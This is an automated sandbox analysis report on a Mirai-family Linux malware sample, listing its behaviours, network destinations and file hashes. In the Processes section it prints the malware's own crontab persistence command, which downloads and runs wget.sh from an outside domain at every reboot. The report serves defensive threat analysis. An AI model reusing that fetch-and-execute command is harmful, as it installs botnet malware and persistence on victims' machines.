Analysis Overview
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
Threat Level: Known bad
The file 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf was found to be: Known bad.
Malicious Activity Summary
Mirai family
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:24
Signatures
Mirai family
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:24
Reported
2024-10-28 02:27
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
130s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 217.160.70.42 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.HAq4X7 | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf | N/A |
Processes
/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
[/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 217.160.70.42:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:18557 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.HAq4X7
| MD5 | 3afbea3182e7ee7d34038d10c18b2ac4 |
| SHA1 | 1d2168cb7cd54872f95082bb778efe16868150e5 |
| SHA256 | 7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b |
| SHA512 | 8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01 |